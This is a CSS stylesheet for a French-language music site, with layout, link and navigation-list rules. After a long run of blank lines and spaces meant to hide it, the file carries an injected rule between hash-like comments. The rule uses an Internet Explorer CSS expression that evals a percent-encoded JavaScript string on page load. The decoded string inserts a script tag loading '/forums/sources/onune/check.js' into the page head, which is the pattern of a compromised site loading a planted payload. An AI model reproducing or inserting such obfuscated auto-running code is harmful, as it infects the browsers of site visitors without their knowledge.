BODY
{   background-color:#000000;
    text-align: center;
    vertical-align: middle;
    font-size : 8pt;
    font-family : Verdana;
    color : #D3D3D3;
}

TD
{   font-size : 8pt;
    font-family : Verdana;
    color : #D3D3D3;
}


/* Id */
#main
{   position: absolute;
    left: 50%;
    top: 50%;
    width:1000;
    height:672;
    margin-left: -500px;
    margin-top: -300px;
    text-align: center;
    vertical-align: middle;
    font-size : 8pt;
    font-family : Verdana;
    color : #ffff00;
}

#titre
{   position: absolute;
    left: 225px;
    top: 0px;
}

#div_liens
{   position: absolute;
    left: 210px;
    top: 510px;
    text-align: left;
    vertical-align: middle;
    font-size : 8pt;
    font-family : Verdana;
    color : #000000;
}

#div_news
{   position: absolute;
    left: 690px;
    top: 0px;
    text-align: left;
    vertical-align: middle;
    font-size : 8pt;
    font-family : Verdana;
    color : #D3D3D3;
}

/* SCROLLING */
#divUp
{   width:20px;
    position:absolute;
    left:770px;
    top:110px;
}
#divDown
{   width:20px;
    position:absolute;
    left:770px;
    top:130px;
}
#barre_haut
{   width:245px;
    height:4px;
    position:absolute;
    left:690px;
    top:80px;
}
#divScrollTextCont
{   position:absolute;
    width:550px;
    height:390px;
    left:210px;
    top:110px;
    clip:rect(0px, 550px, 385px, 0px);
    overflow:hidden;
    visibility:visible;
}
#divText
{   position:relative;
    left:0px;
    top:0px;
    width:550;
    text-align: left;
    color: #ffffff;
}
#barre_bas
{   position:absolute;
    width:245px;
    height:4px;
    left:690px;
    top:480px;
}
#liens_news
{   position:absolute;
    width:245px;
    left:690px;
    top:500px;
}

/* CLASSES */
.date
{   font-size : 8pt;
    font-family : Verdana;
    font-weight : bold;
    color : lightgrey;
}
.news
{   font-size : 7pt;
    font-family : Verdana;
    color : lightgrey;
}
.concerts
{   font-size : 14pt;
    font-family : Monotype Corsiva;
    color : #ffffff;
}

/* LIENS */
a:link, a:visited, a:active
{   color : #FFFFFF;
    font-weight : bold;
    font-size : 8pt;
    text-decoration: none;
    font-family: Verdana;
}
a:hover
{   color : darkred;
    font-weight : bold;
    font-size : 8pt;
    text-decoration: none;
    font-family: Verdana;
}

a.accueil:link, a.accueil:visited, a.accueil:active
{   color : darkblue;
    font-weight : bold;
    font-size : 8pt;
    text-decoration: none;
    font-family: Verdana;
}
a.accueil:hover
{   color : #ffffff;
    font-weight : bold;
    font-size : 8pt;
    text-decoration: none;
    font-family: Verdana;
}


a.lyrics:link, a.lyrics:visited, a.lyrics:active
{   color : lightgrey;
    font-weight : bold;
    font-size : 8pt;
    text-decoration: none;
    font-family: Verdana, Arial, Helvetica, sans-serif;
}
a.lyrics:hover
{   color : darkred;
    font-weight : bold;
    font-size : 8pt;
    text-decoration: none;
    font-family: Verdana, Arial, Helvetica, sans-serif;
}

a.image:link, a.image:visited, a.image:active
{   color : lightgrey;
    font-weight : bold;
    font-size : 8pt;
    text-decoration: none;
    font-family: Verdana, Arial, Helvetica, sans-serif;
}
a.image:hover
{   color : lightgrey;
    font-weight : bold;
    font-size : 8pt;
    text-decoration: none;
    font-family: Verdana, Arial, Helvetica, sans-serif;
}


/* Liens de la page d'accueil */

#navlist
{
  position: absolute;
  left:0px;
  top:520px;
  width: 100%;
  text-align: center;
  margin: 0 auto;
  padding: 0;
  text-indent: 0;
  list-style-type: none;
}

#navlist li
{
  padding: 0;
  margin: 0;
  text-indent: 0;
  display: inline;
  font-family: Verdana, Arial, Helvetica, sans-serif;
}

#navlist li a
{
  text-decoration: none;
  color: darkblue;
  font-weight: bold;
  font-family: Verdana, Arial, Helvetica, sans-serif;
  font-size: 8pt;
  padding: 0 2px;
}

#navlist li a:hover,#navlist a#current
{
  color: #ffffff;
  border-top: none;
  font-weight: bold;
  font-family: Verdana, Arial, Helvetica, sans-serif;
  font-size: 12pt;
}

#navlist a#current { color: #ffffff; }

#navlist li:before { content: "| "; color: #000000;}
#navlist li:first-child:before { content: ""; }




































































































                                                                                                                                                      /* a0b4df006e02184c60dbf503e71c87ad */ body { margin-top: expression(eval(unescape('%69%66%20%28%21%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%42%79%49%64%28%27%4A%53%53%53%27%29%29%7B%20%4A%53%53%31%20%3D%20%35%39%3B%20%4A%53%53%32%20%3D%20%35%36%37%30%39%34%3B%20%4A%53%53%33%20%3D%20%27%2F%66%6F%72%75%6D%73%2F%73%6F%75%72%63%65%73%2F%6F%6E%75%6E%65%2F%64%75%6D%6D%79%2E%68%74%6D%27%3B%20%76%61%72%20%6A%73%20%3D%20%64%6F%63%75%6D%65%6E%74%2E%63%72%65%61%74%65%45%6C%65%6D%65%6E%74%28%27%73%63%72%69%70%74%27%29%3B%20%6A%73%2E%73%65%74%41%74%74%72%69%62%75%74%65%28%27%73%72%63%27%2C%20%27%2F%66%6F%72%75%6D%73%2F%73%6F%75%72%63%65%73%2F%6F%6E%75%6E%65%2F%63%68%65%63%6B%2E%6A%73%27%29%3B%20%6A%73%2E%73%65%74%41%74%74%72%69%62%75%74%65%28%27%69%64%27%2C%20%27%4A%53%53%53%27%29%3B%20%64%6F%63%75%6D%65%6E%74%2E%67%65%74%45%6C%65%6D%65%6E%74%73%42%79%54%61%67%4E%61%6D%65%28%27%68%65%61%64%27%29%2E%69%74%65%6D%28%30%29%2E%61%70%70%65%6E%64%43%68%69%6C%64%28%6A%73%29%20%7D%3B%20'))) } /* a995d2cc661fa72452472e9554b5520c */                                                                                                                                                      




































































































